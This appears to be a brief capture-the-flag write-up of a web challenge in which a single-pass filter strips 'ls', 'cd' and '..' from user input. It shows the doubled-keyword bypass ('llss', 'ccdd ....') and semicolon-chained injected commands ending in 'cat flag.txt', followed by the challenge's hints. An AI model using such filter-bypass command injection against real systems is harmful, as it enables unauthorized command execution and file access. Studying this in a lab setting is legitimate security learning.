The first look at page
We have an input field, try giving some input like ccccdddd but what we get back is What I See ◔_◔ cccddd. This gives us the indication of certain sort of filter running in background. Our task now is to identify various filter techniques.
One filter from observation is on cd, ls, d..
Got only cd back means .. got removed
Got cd .. in bag
No output on ls means ls is getting removed
Worked with llss
So finally our query can go as such
- llss (nothing readable or useful move a directory up)
- ccdd ....; llss (nothing in injection base move up again)
- ccdd ....; ccdd ....; llss (flag file visible)
And final query goes like below to get flag
- ccdd ....; ccdd ....; cat flag.txt
Hints with point values (cost) :-
- Hint 1 :- "aabcbc".replace("abc","") = abc (50 pts)
- Hint 2 :- (100 pts) -- ls is replaced by NULL -- cd is replaced by NULL -- d .. is replaced by d